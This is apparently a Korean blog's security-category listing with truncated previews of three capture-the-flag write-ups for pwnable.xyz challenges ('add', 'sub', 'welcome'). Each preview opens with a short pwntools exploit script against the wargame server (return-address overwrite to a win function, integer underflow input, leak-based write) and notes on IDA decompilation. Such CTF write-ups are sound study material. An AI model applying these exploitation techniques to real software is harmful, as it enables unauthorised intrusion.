security 183

pwnable.xyz - add

from pwn import * p = remote("svc.pwnable.xyz", 30002) # v7 = rbp-0x60 # RET 위치는 rbp+0x8 # 0x68 차이남 (8Byte*13) win = 0x400822 # printf_got = 0x601028 # ASLR 때문에 스택 위치 랜덤, v7 배열 시작 위치도 계속 바뀔 것 # v7과 printf_got 간 차이를 leak 없이 구하긴 힘들다 offset = (0x7fffffffddc0-0x601048)//8 p.recvuntil("Input: ") pay = str(int(win))+" "+str(0)+" "+str(int(13)) p.sendline(pay) # while문 종료시키기 p.recvuntil("Input: ") p.se..

pwnable.xyz - sub

from pwn import * p = remote("svc.pwnable.xyz", 30001) p.recvuntil("1337 input: ") p.sendline("4918 -1") p.interactive() - 마찬가지 chmod +x ./challenge 해서 실행권한 부여해서 실행해봄 - IDA로 디컴파일해서 동작 분석해보자 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int v4; // [rsp+0h] [rbp-18h] BYREF int v5; // [rsp+4h] [rbp-14h] BYREF unsigned __int64 v6; // [rsp+8h] [rbp-10h] // fs 세그먼트 기준 0x28만큼 떨어져있는 메모리의 q..

pwnable.xyz - welcome

from pwn import * p = remote("svc.pwnable.xyz", 30000) p.recvuntil("Leak: ") leak = int(p.recvline()[:-1], 16) p.sendlineafter("message: ", str(int(leak+1))) p.sendafter("message: ", 'aaaa') p.interactive() -rw-r--r-- 1 minseo minseo 10224 12월 26 2018 challenge - cat해서 보니까 ELF 파일임 - 실행 권한이 없네요: chmod +x ./challenge - memory leak 있고 입력받는거보니 bof 하는거같네요 (근데 보호기법 전부 MAX로 적용되어있는데?ㅋㅋ) - 심볼 파일이 없어서 bp ..